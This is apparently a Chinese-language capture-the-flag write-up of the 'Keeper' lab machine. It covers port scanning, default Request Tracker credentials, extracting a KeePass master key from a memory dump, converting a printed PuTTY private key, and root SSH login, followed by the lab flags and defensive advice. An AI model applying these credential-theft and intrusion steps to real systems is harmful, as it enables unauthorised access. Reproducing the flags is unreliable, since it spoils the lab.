Keeper渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>
目标IP: 10.10.11.227<\/code><\/li>
扫描命令:<\/li>
<\/ul>
ip=<\/span>'10.10.11.227'<\/span>; itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>;
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>;
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>;
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>;
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>;
<\/span><\/span>  fi<\/span>;
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>;
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>1.2 端口扫描结果<\/h3>

22\/tcp<\/strong>: OpenSSH 8.9p1 Ubuntu 3ubuntu0.3

SSH主机密钥:

ECDSA: 256 3539d439404b1f6186dd7c37bb4b989e<\/li>
ED25519: 256 1ae972be8bb105d5effedd80d8efc066<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
80\/tcp<\/strong>: nginx 1.18.0 (Ubuntu)

HTTP标题: Login<\/li>
服务器头: nginx\/1.18.0 (Ubuntu)<\/li>
<\/ul>
<\/li>
<\/ul>
2. Web应用渗透<\/h2>
2.1 Request Tracker (RT)访问<\/h3>

添加主机名到\/etc\/hosts:<\/li>
<\/ol>
echo '10.10.11.227 tickets.keeper.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>
访问URL:<\/li>
<\/ol>

http:\/\/tickets.keeper.htb\/<\/li>
默认凭证:

用户名: root<\/code><\/li>
密码: password<\/code><\/li>
<\/ul>
<\/li>
<\/ul>

管理界面:<\/li>
<\/ol>

http:\/\/tickets.keeper.htb\/rt\/Admin\/Users\/Modify.html?id=27<\/li>
发现用户密码: Welcome2023!<\/code><\/li>
<\/ul>
3. 初始访问<\/h2>
3.1 获取用户标志<\/h3>

用户标志位置: 3e065105fb5ec6a9d4d4875f1fa99185<\/code><\/li>
<\/ul>
4. 权限提升<\/h2>
4.1 KeePass主密钥提取<\/h3>

从目标系统下载KeePass相关文件:<\/li>
<\/ol>
scp lnorgaard@10.10.11.227:\/home\/lnorgaard\/RT30000.zip \/tmp\/
<\/span><\/span><\/code><\/pre>
使用KeePass密码转储工具:<\/li>
<\/ol>

工具地址: https:\/\/github.com\/vdohney\/keepass-password-dumper<\/li>
安装依赖:<\/li>
<\/ul>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>wget https:\/\/packages.microsoft.com\/config\/debian\/11\/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
<\/span><\/span>dpkg -i packages-microsoft-prod.deb
<\/span><\/span>apt update
<\/span><\/span>apt install -y dotnet-sdk-7.0
<\/span><\/span>dotnet --version
<\/span><\/span><\/code><\/pre>
提取主密钥:<\/li>
<\/ol>
dotnet run KeePassDumpFull.dmp "dgrød med fløde"<\/span>
<\/span><\/span><\/code><\/pre>
解密passcodes.kdbx文件:<\/li>
<\/ol>

使用Keeweb在线工具: https:\/\/app.keeweb.info\/<\/li>
密码: rødgrød med fløde<\/code><\/li>
<\/ul>
4.2 PPK转id_rsa私钥<\/h3>

PPK文件内容示例:<\/li>
<\/ol>
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse\/hMswGBRQsPsC\/EwyxJvc8Wpul\/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj\/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q\/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8\/UFNdG\/X2hnXTPZKSzQxxkicDw6VR+1ye\/t\/dOS2yjbnr6joDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44\/otK4ScF2hEputYf7n24kvL0WlBQThsiLkKcz3\/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t\/plLJzTVkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1\/TccbTgWivzUXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+\/ASrc04ZIVagCge1Qq8iWsOxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl\/ExGzin6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3\/uYrIZ1rSsGN1FbK\/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss\/gc7o9TnHNPFJ5iRyiXagT4E2WEEaxHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkAAACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19\/TF8oZMDuJoiGyq6faDAF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGyNNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
<\/code><\/pre>

使用puttygen转换PPK为OpenSSH格式:<\/li>
<\/ol>
puttygen ppk -O private-openssh -o id_rsa
<\/span><\/span><\/code><\/pre>
使用转换后的私钥进行SSH登录:<\/li>
<\/ol>
ssh root@10.10.11.227 -i id_rsa
<\/span><\/span><\/code><\/pre>4.3 获取root标志<\/h3>

root标志位置: 00172c33f60bd92c400e0bd2825d1301<\/code><\/li>
<\/ul>
5. 关键知识点总结<\/h2>


信息收集技巧<\/strong>:<\/p>

使用masscan进行快速端口扫描<\/li>
使用nmap进行服务版本探测<\/li>
<\/ul>
<\/li>

Web应用渗透<\/strong>:<\/p>

Request Tracker默认凭证利用<\/li>
用户管理界面URL构造<\/li>
<\/ul>
<\/li>

权限提升方法<\/strong>:<\/p>

KeePass进程内存转储分析<\/li>
使用KeePass密码转储工具提取主密钥<\/li>
PPK格式私钥转换为OpenSSH格式<\/li>
<\/ul>
<\/li>

工具使用<\/strong>:<\/p>

KeePass密码转储工具安装与使用<\/li>
puttygen进行密钥格式转换<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>


针对KeePass的安全措施<\/strong>:<\/p>

避免长时间保持KeePass进程运行<\/li>
使用安全桌面功能防止内存转储<\/li>
定期更改主密码<\/li>
<\/ul>
<\/li>

SSH安全<\/strong>:<\/p>

禁用root直接登录<\/li>
使用密钥认证时设置强密码保护<\/li>
定期轮换SSH密钥<\/li>
<\/ul>
<\/li>

Web应用安全<\/strong>:<\/p>

更改默认管理凭证<\/li>
实施账户锁定策略<\/li>
限制管理界面访问IP<\/li>
<\/ul>
<\/li>

系统安全<\/strong>:<\/p>

定期检查进程内存转储风险<\/li>
监控异常登录行为<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>